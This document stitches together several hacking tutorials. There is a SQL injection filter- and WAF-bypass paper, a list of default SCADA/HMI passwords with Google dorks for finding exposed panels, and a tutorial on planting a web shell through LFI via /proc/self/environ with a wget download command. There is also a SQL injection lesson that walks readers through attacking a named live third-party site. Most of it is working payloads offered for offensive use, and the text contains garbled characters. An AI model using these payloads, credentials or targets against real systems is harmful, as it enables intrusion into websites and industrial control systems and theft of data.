Beyond SQLi: Obfuscate and Bypassauthor: "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan" (CWH Underground)

Contents

1 [0x00] - Introduction

2 [0x01] - Filter Evasion (Mysql)

3 [0x02] - Normally Bypassing Techniques

4 [0x03] - Advanced Bypassing Techniques

5 [0x04] - How to protect your website

6 [0x05] - Conclusion

7 [0x06] - References

[0x00] - Introduction

Welcome readers, this paper is a long attempt at documenting advanced SQL injection we have been working on. This papers will disclose advanced bypassing and obfuscation techniques which many of them can be used in the real CMSs and WAFs. The proposed SQL injection statements in this paper are just some ways to bypass the protection. There are still some other techniques can be used to attacks web applications but unfortunately we cannot tell you right now, as it is kept as a 0-day attack. However, this paper aims to show that there is no completely secure system in the real world even though you spend more than 300,000 USD on a WAF.

This paper is divided into 7 sections but only from section 0x01 to 0x03 are about technical information.

Section 0x01, we give a details of how to bypass filter including basic, function and keyword. Section 0x02, we offer normally bypassing techniques for bypass OpenSource and Commercial WAF. Section 0x03, we talk in-depth Advanced bypassing techniques that separate into 2 section, "HTTP Parameter Contamination". and "HTTP Pollution: Split and Join". Section 0x04, we guide to protect your own website on the right solution. The last, section 0x05, It's conclusion from Section 0x01-0x04.

[0x01] - Filter Evasion (Mysql)

This section will describe filter evasion behaviors based on PHP and MySQL and how to bypass the filtering. Filter Evasion is a technique used to prevent SQL injection attacks. This technique can be done by using a SQL functions and keywords filtering or regular expressions. This means that filter evasion relies heavily upon how storing a black list or regular expression is. If the black list or regular expression does not cover every injection scenario, the web application is still vulnerable to SQL

Injection attacks.

[0x01a] - Bypass Functions and Keywords Filtering

Functions and keywords filtering prevents web applications from being attacked by using a functions and keywords black list. If an attackers submits an injection code containing a keyword or SQL function in the black list, the injection will be unsuccessful. However, if the attacker is able to manipulate the injection by using another keyword or function, the black list will fail to prevent the attack. In order to prevent attacks, a number of keywords and functions has to be put into the black list. However, this affects users when the users want to submit input with a word in the black list. They will be unable to submit the input because it is being filtered by the black list. The following scenarios showcases of using functions and keywords filtering and bypassing techniques. Keyword filer: and, or----------------------------------------------------------------------PHP filter code: preg_match('/(and|or)/i', $id)

THe keywords and, or are usually used as a simple test to determine whether a web application isvulnerable to SQL Injection attacks. Here is a simple bypass using &&, || instead of and, orrespectively.

Filtered injection: 1 or 1 = 1 1 and 1 = 1Bypassed injection: 1 || 1 = 1 1 && 1 = 1----------------------------------------------------------------------

Keyword filer: and, or, union----------------------------------------------------------------------PHP filter code: preg_match('/(and|or|union)/i', $id)

The keyword union is generally used to generate an malicious statement in order to select extradata from the database.

Filtered injection: union select user, password from usersBypassed injection: 1 || (select user from users where user_id = 1) = 'admin'

** Remark: you have to know table name, column name and some data in the table, otherwise you haveto get it from information_schema.columns table using other statement e.g. use substring function to get each character of table names.----------------------------------------------------------------------

Keyword filer: and, or, union, where----------------------------------------------------------------------PHP filter code: preg_match('/(and|or|union|where)/i', $id)Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'Bypassed injection: 1 || (select user from users limit 1) = 'admin'----------------------------------------------------------------------

Keyword filer: and, or, union, where, limit----------------------------------------------------------------------PHP filter code: preg_match('/(and|or|union|where|limit)/i', $id)

Filtered injection: 1 || (select user from users limit 1) = 'admin'Bypassed injection: 1 || (select user from users group by user_id having user_id= 1) = 'admin'----------------------------------------------------------------------

Keyword filer: and, or, union, where, limit, group by----------------------------------------------------------------------PHP filter code: preg_match('/(and|or|union|where|limit|group by)/i', $id)Filtered injection: 1 || (select user from users group by user_id having user_id= 1) = 'admin'Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1----------------------------------------------------------------------

Keyword filer: and, or, union, where, limit, group by, select----------------------------------------------------------------------PHP filter code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'Bypassed injection: 1 || substr(user,1,1) = 'a'----------------------------------------------------------------------

Keyword filer: and, or, union, where, limit, group by, select, '----------------------------------------------------------------------PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1Bypassed injection: 1 || user_id is not nullBypassed injection: 1 || substr(user,1,1) = 0x61Bypassed injection: 1 || substr(user,1,1) = unhex(61)----------------------------------------------------------------------

Keyword filer: and, or, union, where, limit, group by, select, ', hex----------------------------------------------------------------------PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)Filtered injection: 1 || substr(user,1,1) = unhex(61)Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))----------------------------------------------------------------------

Keyword filer: and, or, union, where, limit, group by, select, ', hex, substr----------------------------------------------------------------------PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))Bypassed injection: 1 || lpad(user,7,1)----------------------------------------------------------------------

Keyword filer: and, or, union, where, limit, group by, select, ', hex,

substr, white space----------------------------------------------------------------------PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)Filtered injection: 1 || lpad(user,7,1)Bypassed injection: 1%0b||%0blpad(user,7,1)----------------------------------------------------------------------

From the above examples, it can be seen that there are a number of SQL statements used for bypassing the black list although the black list contains many keywords and functions. Furthermore, there are a huge SQL statements, that are not on the mentioned examples, that can be used to bypass the black list.

Creating a bigger black list is not a good idea to protect your own websites. Remember, the more keywords and functions filtering, the less user friendly.

[0x01b] - Bypass Regular Expression Filtering

Regular expression filtering is a better solution to prevent SQL injection than keywords and functions filtering because it is used pattern matching to detect attacks. Valid users are allowed to submit more flexible input to the server. However, many regular expression can also be bypassed. The following examples illustrate injection scripts that used to bypass regular expressions in the OpenSource PHPIDS0.6.

PHPIDS generally blocks input containing = or ( or ' following with any a string or integer e.g. 1 or 1=1, 1 or '1', 1 or char(97). However, it can be bypassed using a statement that does not contain =, ( or 'symbols. filtered injection: 1 or 1 = 1Bypassed injection: 1 or 1filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7aBypassed Injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273

[0x02] - Normally Bypassing Techniques

In this section, we mention about the techniques to bypass Web Application Firewall (WAF). First thingyou need to know what's WAF?

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to anHTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

WAFs are often called 'Deep Packet Inspection Firewalls' coz they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/Web service lacers. Some modern WAF systems work

both with attack signatures and abnormal behavior.

Now Let's rock to understand How to breach it with obfuscate, All WAFs can be bypassed with the time to understand their rules or using your imagination !!

1. Bypass with Comments

SQL comments allow us to bypass a lot of filtering and WAFs.

http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--

2. Case Changing

Some WAFs filter only lowercase SQL keyword.

Regex Filter: /union\sselect/g

http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--

3. Replaced keywords

Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily.

http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--

Some case SQL keyword was filtered out and replaced with whitespace. So we can use "%0b" to bypass. http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--Forbidden: http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).htmlBypassed : http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html

4. Character encoding

Most CMSs and WAFs will decode and filter/bypass an application input, but some WAFs only decode the input once so double encoding can bypass certain filters as the WAF will decode the input once thenfilter while application keep decoding the SQL statement executing http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--

Moreover, these techniques can combine to bypass Citrix Netscaler

- Remove all "NULL" words - Use query encoding in some parts - Remove the single quote character "'" - And Have fun !! Credit: Wendel Guglielmetti Henrique

and "Armorlogic Profense" prior to 2.4.4 was bypassed by URL-encoded newline character.

1. Real World Example

1. NukeSentinel (Nuke Evolution)

Nukesentinel.php Code // Check for UNION attack// Copyright 2004(c) Raven PHP Scripts$blocker_row = $blocker_array[1];if($blocker_row['activate'] > 0) {

if (stristr($nsnst_const['query_string'],'+union+') OR \stristr($nsnst_const['query_string'],'%20union%20') OR \stristr($nsnst_const['query_string'],'*/union/*') OR \stristr($nsnst_const['query_string'],' union ') OR \stristr($nsnst_const['query_string_base64'],'+union+') OR \stristr($nsnst_const['query_string_base64'],'%20union%20') OR \stristr($nsnst_const['query_string_base64'],'*/union/*') OR \stristr($nsnst_const['query_string_base64'],' union ')) { //

block_ip($blocker_row); die("BLOCK IP 1 " ); }}

We can bypass their filtering with these script: Forbidden: http://victim.com/php-nuke/?/**/union/**/select ..�Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select�Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect�

2. Mod Security CRS (Credit: Johannes Dahse) SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \ "phase2,rev:'2.2.1',capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"

We can bypass their filtering with this code: http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user

From this attack, We can bypass Mod Security rule. Let see what's happen !! MySQL Server supports 3 comment styles:

- From a "#" character to the end of the line- From a "--" sequence to the end of the line- From a /* sequence to the following */ sequence, as in the C programming

language. This syntax enables a comment to extend over multiple lines because the beginning andclosing sequences need not be on the same line.

The following example, We used "%0D%0A" as the new line characters. Let's take a look at the first request(to extract the DB user)

The resulting SQL payload looked something like this: 0 div 1 union#foo*/*/barselect#foo

1,2,current_user

However the SQL payload, when executed by the MySQL DB, looked something like this: 0 div 1 union select 1,2,current_user

5. Buffer Overflow

WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of data. Give a large amount of data allows our code executing http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141414141414141 .)�+union+select+1,2,version(),database(),user(),6,7,8,9,10--

6. Inline Comments (Mysql Only)

From MySQL 5.0 Reference Manual, MySQL Server supports some variants of C-style comments. These enable you to write code that includes MySQL extensions, but is still portable, by using comments of the following form:

/*! MySQL-specific code */

In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement, but other SQL servers will ignore the extensions.

A lot of WAFs filter SQL keywords like /union\sselect\ig We can bypass this filter by using inline comments. http://victim.com/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--

Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can add more inline comments http://victim.com/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

[0x03] - Advanced Bypassing Techniques

In this section, we offer 2 techniques are "HTTP Pollution: Split and Join" and "HTTP Parameter Contamination". From these techniques can bypass a lot of OpenSource and Commercial Web application firewall (WAF)

[0x03a] - HTTP Parameter Pollution: Split and Join

HTTP Pollution is a new class of injection vulnerability by Luca Carettoni and Stefano Di Paola. HPP is a quite simple but effective hacking technique. HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string. Example of HPP: "http://victim.com/search.aspx?par1=val1&par1=val2"

HTTP Parameter Handling: (Example) +------------------------------------------------------------------+| Web Server | Parameter Interpretation | Example |

+------------------------------------------------------------------+| ASP.NET/IIS | Concatenation by comma | par1=val1,val2 || ASP/IIS | Concatenation by comma | par1=val1,val2 || PHP/Apache | The last param is resulting | par1=val2 || JSP/Tomcat | The first param is resulting | par1=val1 || Perl/Apache | The first param is resulting | par1=val1 || DBMan | Concatenation by two tildes | par1=val1~~val2 |+------------------------------------------------------------------+

What would happen with WAFs that do Query String parsing before applying filters ? (HPP can be used even to bypass WAFs)

Some loose WAFs may analyze and validate a single parameter occurrence only (first or last one). Whenever the deal environment concatenates multiple occurrences (ASP, ASP.NET, DBMan, ) an �aggressor can split the malicious payload. In a recent penetration test (Again), we were able to bypass aImperva SecureSphere using "HPP+Inline Comment" on ASP/ASP.NET environment.

This technique can bypass other Commercial WAFs too. More information about "HPP+Inline Comment" show below:

1. Real World Example

1. Mod Security CRS (Credit: Lavakumar Kuppan)

The following request matches against the ModSecurity CRS as a SQL Injection attack and is blocked. Forbidden: http://victim.com/search.aspx?q=select name,password from users

When the same payload is split against multiple parameters of the same name ModSecurity fails to block it. Bypassed : http://victim.com/search.aspx?q=select name&q=password from users

Let's see what's happen, ModSecurity's interpretation is q=select nameq=password from users

ASP/ASP.NET's interpretation is q=select name,password from users

Tip: This attack can be carried out on a POST variable in a similar way

2. Commercial WAFs Forbidden: http://victim.com/search.aspx?q=select name,password from users

Now we use HPP+Inline comment to bypass it. Bypassed : http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users

Analyzing, WAF's interpretation is q=select/*q=*/nameq=password/*q=*/from/*

q=*/users

ASP/ASP.NET's interpretation is q=select/*,*/name,password/*,*/from/*,*/usersq=select name,password from users

3. IBM Web Application Firewall (Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs) Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell net user �zeq3ul UrWaFisShiT /add --�

Now we use HPP+Inline comment to bypass it. Bypassed : http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ net user lucifer UrWaFisShiT /*&id=1*/ --� �

Analyzing, WAF's interpretation is id=1; /*�id=1*/ EXEC /*id=1*/ master..xp_cmdshell /*id=1*/ net user zeq3ul UrWaFisShiT /*� �id=1*/ --

ASP/ASP.NET's interpretation is id=1; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ net user zeq3ul UrWaFisShiT � � �/*,1*/ --id=1; EXEC master..xp_cmdshell net user zeq3ul UrWaFisShiT --� � �

The easiest mitigation to this attack would be for the WAF to disallow multiple instances of the same parameter in a single HTTP request. This would prevent all variations of this attack.

However this might not be possible in all cases as some applications might have a legitimate need for multiple duplicate parameters. And they might be designed to send and accept multiple HTTP parameters of the same name in the same request.To protect these applications the WAF should also interpret the HTTP request in the same way the web application would.

[0x03b] - HTTP Parameter Contamination

HTTP Parameter Contamination (HPC) original idea comes from the innovative approach found in HPP research by exploring deeper and exploiting strange behaviors in Web Server components, Web Applications and Browsers as a result of query string parameter contamination with reserved or non expects characters.

Some facts: - The term Query String is commonly used to refer to the part between the "?" and the end of the URI - As defined in the RFC 3986, it is a series of field-value pairs - Pairs are separated by "&" or ";" - RFC 2396 defines two classes of characters: Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' () Reserved : ; / ? : @ & = + $ , Unwise : { } | \ ^ [ ] `

Different web servers have different logic for processing special created requests. There are more web server, backend platform and special character combinations, but we will stop here this time.

Query string and Web server response (Example) +-----------------------------------------------------------+| Query String | Web Servers response / GET values |

+-----------------------------------------------------------+| | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP |+-----------------------------------------------------------+| ?test[1=2 | test_1=2 | test[1=2 || ?test=% | test=% | test= || ?test%00=1 | test=1 | test=1 || ?test=1%001 | NULL | test=1 || ?test+d=1+2 | test_d=1 2 | test d=1 2 |+-----------------------------------------------------------+

Magic character "%" affect to ASP/ASP.NET +--------------------------------------------------------------------+| Keywords | WAF | ASP/ASP.NET |+--------------------------------------------------------------------+| sele%ct * fr%om.. | sele%ct * fr%om.. | select * from.. || ;dr%op ta%ble xxx | ;dr%op ta%ble xxx | ;drop table xxx || <scr%ipt> | <scr%ipt> | <script> || <if%rame> | <if%rame> | <iframe> |+--------------------------------------------------------------------+

1. Real world examples:

1. Bypass Mod_Security SQL Injection rule (modsecurity_crs_41_sql_injection_attacks.conf) [Sun Jun 12 12:30:16 2011] [error] [client 192.168.2.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\bsys\\.user_objects\\b" at ARGS_NAMES:sys.user_objects. [file "/etc/apache2/conf.d/crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "110"] [id "959519"] [rev "2.2.0"] [msg "Blind SQL Injection Attack"] [data "sys.user_objects"] [severity "CRITICAL"] [tag "WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "localhost"] [uri "/"] [unique_id "TfT3gH8AAQEAAAPyLQQAAAAA"]Forbidden: http://localhost/?xp_cmdshellBypassed : http://localhost/?xp[cmdshell

2. Bypass URLScan 3.1 DenyQueryStringSequences rule Forbidden: http://localhost/test.asp?file=../bla.txtBypassed : http://localhost/test.asp?file=.%./bla.txt

3. Bypass AQTRONIX Webknight (WAF for IIS and ASP/ASP.Net Forbidden: http://victim.com/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)Bypassed : http://victim.com/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

From this situation, Webknight use SQL keywords filtering when we use "HTTP contamination" by insert "%" into SQL keywords WAF is bypassed and sending these command to Web server: "id=10 and 1=0/(select top 1 table_name from information_schema.tables)" because "%" is cutter in web server.

These types of hacking techniques are always interesting because they reveal new perspectives on security problems. Many applications are found to be vulnerable to this kind of abuse because there are no defined rules for strange web server behaviors. HPC can be used to extend HPP attack with spoofingreal parameter name in the QUERY_STRING with "%" character on an IIS/ASP platform, if there is WAF who blocks this kind of an attack.

[0x04] - How to protect your website

Implement Software Development Life Cycle (SDLC)

Secure Coding: Validate all inputs and outputs

PenTest before online

Harden it !!

Revisit PenTest

Deploy WAF (For Optional)

Always check WAF patch

[0x05] - Conclusion

WAFs is not the long-expected

It's functional limitations, WAF is not able to protect a web app from all possible vulnerabilities

It's necessary to adapt WAF filter to the particular web app being protected

WAF doesn't eliminate a vulnerability, It just partly screens the attack vector

[0x06] - References

WAF Bypass: SQL Injection - Kyle

http://cwe.mitre.org/data/definitions/98.html

HTTP Parameter Contamination - Ivan Markovic NSS

Split and Join - Lavakumar Kuppan

HTTP Parameter Pollution - Luca Carettoni and Stefano di Paola

blog.spiderlabs.com

source

Hacking SCADA SystemsWith the discovery of stuxnet and all the subsequent interest in industrial control systems it's worthwhile to learn a bit on how to exploit these for our own purposes. For now it's a copypaste of various information on ICS products. Eventually I will rewrite it as a fluent tutorial, but until then you can use this article as a starting point in your own research.

Contents

1 Terminology

2 Default Passwords

3 Google Dorks

4 Vulnerabilities and Other Resources

Terminology

PLC: Programmable Logic Controller

RTU: Remote Terminal Unit

HMI: Human-Machine Interface

Default Passwords

These should always be your first try if you come across an HMI listed. Due to the fact that the amount of attention these systems have received has only been true in recent months many of these HMIs still have their defaults. These can be accessed using a web panel, telnet, or VNC. Links to support documents have been provided to familiarize yourself with these systems.

Schneider Electrics pcfactory:pcfactoryloader:fwdownloadntpupdate:ntpupdatesysdiag:factorycast@schneidertest:testingpwUSER:USERUSER:USERUSER webserver:webpagesfdrusers:sresurdfnic2212:poiuypoiuynimrohs2212:qwertyqwertynip2212:fcsdfcsdftpuser:ftpusernoe77111_v500:RcSyyebczSAUTCSE:RybQRceeSd

AUT_CSE:cQdd9debeztarget:RcQbRbzRyc

[1]

Siemens Simatic Administrator:100

[2]

Siemens WinCC WinCCConnect:2WSXcderWinCCAdmin:2WSXcder

[3]

WAGO admin:wago

[4]

Google Dorks

These will be added to as I go along, but are just a couple you can try out to search for HMIs. inurl:/plc/webvisu.htm"Miniweb on" "Control Functions" -filetype:pdf

Vulnerabilities and Other Resources

2. Vulnerabilities in some SCADA server softwares

3. Metasploit Modules for SCADA-related Vulnerabilities

4. SIMATIC HMI panels - some default Simatic HMIs you can play around with

Shell via LFI - proc/self/environ methodauthor: SirGod

Contents

1 Introduction

2 Finding LFI

3 Checking if proc/self/environ is accessible

4 Injecting malicious code

5 Access our shell

Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and injection malicious code in proc/self/environ. Is a step by step tutorial.

Finding LFI

Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it. www.website.com/view.php?page=contact.php

Now lets replace contact.php with ../ so the URL will become www.website.com/view.php?page=../

and we got an error Warning: include(../) [function.include]: failed to open stream: No such file or directory in/home/sirgod/public_html/website.com/view.php on line 1337

big chances to have a Local File Inclusion vulnerability.Let's go to next step.

Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable. Lets make a request: www.website.com/view.php?page=../../../etc/passwd

we got error and no etc/passwd file Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up www.website.com/view.php?page=../../../../../etc/passwd

we succesfully included the etc/passwd file. root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

Checking if proc/self/environ is accessible

Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap,*/*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.comHTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwdHTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/binQUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GETREQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2FenvironSCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.phpSERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.comSERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or theOS is FreeBSD.

Injecting malicious code

Now let's inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.

Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL : www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in User-Agent filed write the following code : <?system('wget http://example.com/Shells/gny.txt -O shell.php');?>

Then submit the request.

Our command will be executed (will download the txt shell and will save it as shell.php in the website directory) through system(), and our shell will be created.If don't work,try exec() because system() can be disabled on the webserver from php.ini.

Access our shell

Now lets check if our malicous code was successfully injected. Lets check if the shell is present. www.website.com/shell.php

Our shell is there.Injection was succesfully.

SQL Injectionauthor: Psiber_Syn

Good afternoon Enigmagroup Users,

0x00 I, the user waive all liability from Enigmagroup.org and its users and admins this lesson is for strict learning purposes only and if I cause damage in any way Enigmagroup.org and its members are not held responsible so do so at your own risk.

In this lesson we will be covering the basics of a common SQL injection. We will begin with finding the vulnerability and eventually exploiting it to "hack" the website. There are a few things that you all must know before we begin. first this will be a live action lesson, meaning the sites displayed and used for example are live sites and are not under the control or ownership of anyone related to Enigmagroup.This being said you may opt to either not participate in the examples or load up your proxy and hack away with the rest of us. Secondly there are a few programs that you may choose to use but are not required it only makes the job a little easier. These things being Firefox and the Hackbar addon. So without further ado, letÂ’s get hacking.

0x01

In the beginning SQL or (structured query language) comes in a few different forms. MYSQL, MSSQLare the most widely used versions but there are others. Today we will focus on MYSQL. The differences in the other versions are mainly syntax and formatting. So in theory once you learn one wayit is easy to adapt to the other version simply by changing your injections around a little. SQL is a database computer language designed for managing data in relational database management systems (RDBMS). This being said it is simply a means of extracting information from a database. For example, if we had a collection of books all from different authors. But we only want to view the ones from the author "Tolkien" a simple query would look like this SELECT Title FROM Books WHERE Author = "Tolkien" This would display exactly what it says all the books that are written by Tolkien in our current list of books. This is the premise for exploiting the vulnerability in the language.

0x02

SQL vulnerabilities occur when a programmer allows the input of escape characters in which allows arbitrary code to be executed. A programmer whom does not sanitize their user inputs is asking to be hacked. By sanitize I mean he/she does not filter what the user is allowed to input and communicate to the server with. For example if the user does not filter out the <>'s characters then they could easily be susceptible to XSS injections but that is for another lesson. The main solution here is to learn to sanitize all user inputs. NEVER trust an end user to input the proper information; always check them with some form of validation.

0x03

Things you should know are the main comment characters used within MYsql statements. These are as follows --, /*, # these are much like any other comment characters in programming languages it allows what follows to not be executed and is mainly for the programmer to explain or comment on the code written either telling them how it works or what parameters are needed etcetc. Next we need to identifythe parameters available for a SQL attack. The main things associated with sql injections are the

parameters normally given to php or asp or some other language but we will focus on PHP. A parameterlike the following http://www.blah.com/index.php?id=1 is a prime example of a common sql injection starting point. Granted there are TONS of things the programmer can call their parameters but the most used are things like id, category_id, news_item etcetc basically anything you can think of could be vulnerable. Normally the injection takes place in the news or image gallery sections of a website. The news is probably the #1 section that is vulnerable so we will use this for an example. When you see a site with the parameters news.php?id=1 then this is a great spot to try your injection. First i always check to see if anything happens when simply placing a ' after the 1 like news.php?id=1' this should cause an error if the query is not properly sanitized. Further attack methods are ' and 1=1--, ‘ and 1=2-- or some other variant. Notice the comment character after your initial injection. This is to comment out the rest of the query and only injection your part which would do two things. ' and 1=1-- will always return true. Which means the page should load normally, but ' and 1=2-- should cause another error or some other kind of thing like for instance the page not being displayed properly. There are cases where you do not get to see these error and things but that is for an advanced lesson. Also takenote that 1=1 or 1=2 does not have to be those numbers you could use anything that would return true such as 'a'='a' you would have to add the 's to make sure it passes to through the statement.

0x04

Now let’s move on to the fun stuff. We have already been given the amount of information that will help us on our journey into the SQL attack. So letÂ’s start with a LIVE site to test our skills.

REMEBER THIS IS A REAL SITE TAKE PRECAUTIONS OR DO NOT PARTICIPATE IF YOU DONT WISH TO http://www.itmaasia.com

First we need to do some recon to find our injection point can anyone find the spot we should use to do our injection? The news parameter looks like a good candidate. http://www.itmaasia.com/news.php?id=1

This is asking the database for all records with the id of 1 to be displayed Now its time to check if its vulnerable or not. And how do we start doing that ?? with a ' of course. :-) http://www.itmaasia.com/news.php?id=1'

This gives an error in SQL errors are your bestest friend.

Further investigation to see if the query gets executed you could use http://www.itmaasia.com/news.php?id=1 and 1=1--

This should load the site like regular change it to http://www.itmaasia.com/news.php?id=1 and 1=2--

Should give an error or a blank page or something along that nature anything that does not load like thepage unmodified. The AND is an operator meaning show all the pages with id = 1 AND if 1=1-- which it does so it returns true and contrary wise.

So now we know the page is vulnerable. Next lets go on to figuring out how many columns the page has.

Using the ORDER BY command allows us to step into the query to check to see how many columns it has. http://www.itmaasia.com/news.php?id=1 order by 1--

This is where Hackbar comes in handy use the load URL button to load the url into hackbar. Now select the 1 at the end of the query and use the + icon to increase the number to 2 repeat this process until an error has occurred. http://www.itmaasia.com/news.php?id=1 order by 2--http://www.itmaasia.com/news.php?id=1 order by 3--

and so on using this method the amount BEFORE the error is how many columns it has not the numberthat causes the error. so if it errors at "order by 28--" then the amount of columns is 27. Also something that may be a little advanced is multiple errors sometimes. I Always use "order by 9999—“ first because unless the site has 9999 columns which would be unheard of then this is your true error. Whichmeans any other errors you get while searching that are not identical to this error are false positives. So have we found the amount of columns yet? http://www.itmaasia.com/news.php?id=1 order by 28--

this causes our first "Unknown column" error so the proper amount of columns is 27 So next we need to set up our UNION statement.

0x05

